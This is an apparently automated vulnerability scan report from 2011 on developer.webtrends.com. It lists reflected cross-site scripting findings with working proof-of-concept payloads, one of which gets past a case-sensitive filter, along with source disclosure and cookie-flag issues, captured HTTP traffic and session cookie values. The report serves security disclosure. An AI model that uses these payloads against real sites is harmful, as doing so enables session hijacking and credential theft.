XSS, developer.webtrends.com, Cross Site Scripting, CWe-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by xss.cx at Mon Mar 14 10:38:23 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Loading

1. Cross-site scripting (reflected)

1.1. https://developer.webtrends.com/community/dc/ [REST URL parameter 2]

1.2. https://developer.webtrends.com/community/dc/ [REST URL parameter 2]

2. Source code disclosure

2.1. https://developer.webtrends.com/4.5.5/resources/scripts/gen/32919256b05f3701fa2b788fe598a3aa.js

2.2. https://developer.webtrends.com/4.5.5/resources/scripts/gen/70ee53f947d13b0d4635f05b93360d0e.js

2.3. https://developer.webtrends.com/community/dc

2.4. https://developer.webtrends.com/community/dc/

3. SSL cookie without secure flag set

3.1. https://developer.webtrends.com/community/dc

3.2. https://developer.webtrends.com/community/dc/

3.3. https://developer.webtrends.com/message/2426

3.4. https://developer.webtrends.com/people/jouni

3.5. https://developer.webtrends.com/people/patrickatcircus

4. Cookie without HttpOnly flag set

4.1. https://developer.webtrends.com/community/dc

4.2. https://developer.webtrends.com/community/dc/

4.3. https://developer.webtrends.com/message/2426

4.4. https://developer.webtrends.com/people/jouni

4.5. https://developer.webtrends.com/people/patrickatcircus

5. Email addresses disclosed

5.1. https://developer.webtrends.com/community/dc

5.2. https://developer.webtrends.com/community/dc/

5.3. https://developer.webtrends.com/opensearch.xml

6. Cacheable HTTPS response

7. Multiple content types specified

8. HTML does not specify charset

9. Content type incorrectly stated

9.1. https://developer.webtrends.com/opensearch.xml

9.2. https://developer.webtrends.com/view-favorite-activity.jspa



1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://developer.webtrends.com/community/dc/ [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://developer.webtrends.com
Path:   /community/dc/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8c0b"><ScRiPt>alert(1)</ScRiPt>6e2b87207f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /community/dcc8c0b"><ScRiPt>alert(1)</ScRiPt>6e2b87207f2/ HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/index.jspa
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Mar 2011 15:34:39 GMT
Server: Apache-Coyote/1.1
X-JAL: 7
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
X-JSL: D=24410 t=1300116879573274
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 55441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="/community/dcc8c0b"><ScRiPt>alert(1)</ScRiPt>6e2b87207f2/create-account.jspa"
accesskey="R"
>
...[SNIP]...

1.2. https://developer.webtrends.com/community/dc/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://developer.webtrends.com
Path:   /community/dc/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b22bd"%3balert(1)//79141c9e70c was submitted in the REST URL parameter 2. This input was echoed as b22bd";alert(1)//79141c9e70c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /community/dcb22bd"%3balert(1)//79141c9e70c/ HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/index.jspa
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Mar 2011 15:34:42 GMT
Server: Apache-Coyote/1.1
X-JAL: 8
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
X-JSL: D=30291 t=1300116882686488
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Length: 55381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
a";
var profileLoadingTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/community/dcb22bd";alert(1)//79141c9e70c/project-chooser!input.jspa";

var containerShortUrl = "/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErrorTooltip = "There wa
...[SNIP]...

2. Source code disclosure  previous  next
There are 4 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


2.1. https://developer.webtrends.com/4.5.5/resources/scripts/gen/32919256b05f3701fa2b788fe598a3aa.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://developer.webtrends.com
Path:   /4.5.5/resources/scripts/gen/32919256b05f3701fa2b788fe598a3aa.js

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /4.5.5/resources/scripts/gen/32919256b05f3701fa2b788fe598a3aa.js HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/index.jspa
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106000454:ss=1300105893745

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:33:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Mon, 14 Mar 2011 09:59:40 GMT
ETag: "1d24c8c-7d30a-49e6e5ecb239e"
Accept-Ranges: bytes
Cache-Control: max-age=315360000
Expires: Thu, 11 Mar 2021 15:33:25 GMT
Vary: Accept-Encoding
X-JSL: D=18934 t=1300116805483040
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/javascript
Content-Length: 512778

/*
* jQuery JavaScript Library v1.4.1
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizz
...[SNIP]...
<");if(c.substring(e,e+3)=="<?x"||c.substring(e,e+3)=="<?X"){var b=c.indexOf("?>");c=c.substring(b+2,c.length)}var e=c.indexOf("<!DOCTYPE");if(e!=-1){var b=c.indexOf(">
...[SNIP]...
d=/^[\w\-]+$/.test(h)?b[h]=b[h]||a(document.getElementById(h).innerHTML):new Function("obj","var p=[],print=function(){p.push.apply(p,arguments);};with(obj){p.push('"+h.replace(/[\r\t\n]/g," ").split("<%").join("\t").replace(/((^|%>)[^\t]*)'/g,"$1\r").replace(/\t=(.*?)%>
...[SNIP]...

2.2. https://developer.webtrends.com/4.5.5/resources/scripts/gen/70ee53f947d13b0d4635f05b93360d0e.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://developer.webtrends.com
Path:   /4.5.5/resources/scripts/gen/70ee53f947d13b0d4635f05b93360d0e.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /4.5.5/resources/scripts/gen/70ee53f947d13b0d4635f05b93360d0e.js HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/message/2426
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745; jive.recentHistory.-1=332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:35:13 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Mon, 14 Mar 2011 10:00:23 GMT
ETag: "1d24c8e-15af2-49e6e61507631"
Accept-Ranges: bytes
Cache-Control: max-age=315360000
Expires: Thu, 11 Mar 2021 15:35:13 GMT
Vary: Accept-Encoding
X-JSL: D=9545 t=1300116913540030
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/javascript
Content-Length: 88818

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
test(f)?b[f]=b[f]||a(document.getElementById(f).innerHTML):new Function("obj","var p=[],print=function(){p.push.apply(p,arguments);};with(obj){p.push('"+f.replace(/[\r\t\n]/g," ").replace(/(^|%>)(.+?)(<%|$)/,function(g,h,i,j){return h+d(i)+j}).split("<%").join("\t").replace(/((^|%>)[^\t]*)'/g,"$1\r").replace(/\t=(.*?)%>
...[SNIP]...

2.3. https://developer.webtrends.com/community/dc  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://developer.webtrends.com
Path:   /community/dc

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /community/dc HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/message/2426
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745; jive.recentHistory.-1=332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:35:34 GMT
Server: Apache-Coyote/1.1
X-JAL: 1158
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=332c333739323b332c333033373b332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b; Expires=Wed, 13-Apr-2011 15:35:33 GMT; Path=/
Vary: Accept-Encoding,User-Agent
X-JSL: D=1191939 t=1300116933431777
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 125492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<textarea id="wysiwygtext" rows="10" class="jive-comment-textarea"><%= body %></textarea>
<textarea name="body" rows="10" style="display:none;" class="jive-comment-textarea"><%= body %></textarea>
...[SNIP]...

2.4. https://developer.webtrends.com/community/dc/  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://developer.webtrends.com
Path:   /community/dc/

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /community/dc/ HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/index.jspa
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:33:46 GMT
Server: Apache-Coyote/1.1
X-JAL: 2180
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031303b; Expires=Wed, 13-Apr-2011 15:33:44 GMT; Path=/
Vary: Accept-Encoding,User-Agent
X-JSL: D=2225670 t=1300116824146362
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 125516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<textarea id="wysiwygtext" rows="10" class="jive-comment-textarea"><%= body %></textarea>
<textarea name="body" rows="10" style="display:none;" class="jive-comment-textarea"><%= body %></textarea>
...[SNIP]...

3. SSL cookie without secure flag set  previous  next
There are 5 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


3.1. https://developer.webtrends.com/community/dc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.webtrends.com
Path:   /community/dc

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/dc HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/message/2426
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745; jive.recentHistory.-1=332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:35:34 GMT
Server: Apache-Coyote/1.1
X-JAL: 1158
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=332c333739323b332c333033373b332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b; Expires=Wed, 13-Apr-2011 15:35:33 GMT; Path=/
Vary: Accept-Encoding,User-Agent
X-JSL: D=1191939 t=1300116933431777
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 125492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

3.2. https://developer.webtrends.com/community/dc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.webtrends.com
Path:   /community/dc/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/dc/ HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/index.jspa
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:33:46 GMT
Server: Apache-Coyote/1.1
X-JAL: 2180
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031303b; Expires=Wed, 13-Apr-2011 15:33:44 GMT; Path=/
Vary: Accept-Encoding,User-Agent
X-JSL: D=2225670 t=1300116824146362
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 125516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

3.3. https://developer.webtrends.com/message/2426  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.webtrends.com
Path:   /message/2426

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/2426 HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/community/dc/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745; jive.recentHistory.-1=31342c323031303b

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:35:12 GMT
Server: Apache-Coyote/1.1
X-JAL: 1173
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=332c333739323b332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b; Expires=Wed, 13-Apr-2011 15:35:11 GMT; Path=/
Vary: Accept-Encoding,User-Agent
X-JSL: D=1191732 t=1300116911084303
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 121597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

3.4. https://developer.webtrends.com/people/jouni  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.webtrends.com
Path:   /people/jouni

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/jouni HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/message/2426
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745; jive.recentHistory.-1=332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:35:34 GMT
Server: Apache-Coyote/1.1
X-JAL: 3113
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=332c333739323b332c333033373b332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b; Expires=Wed, 13-Apr-2011 15:35:34 GMT; Path=/
Vary: Accept-Encoding,User-Agent
X-JSL: D=3131779 t=1300116931660033
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Length: 77095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

3.5. https://developer.webtrends.com/people/patrickatcircus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.webtrends.com
Path:   /people/patrickatcircus

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/patrickatcircus HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/message/2426
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
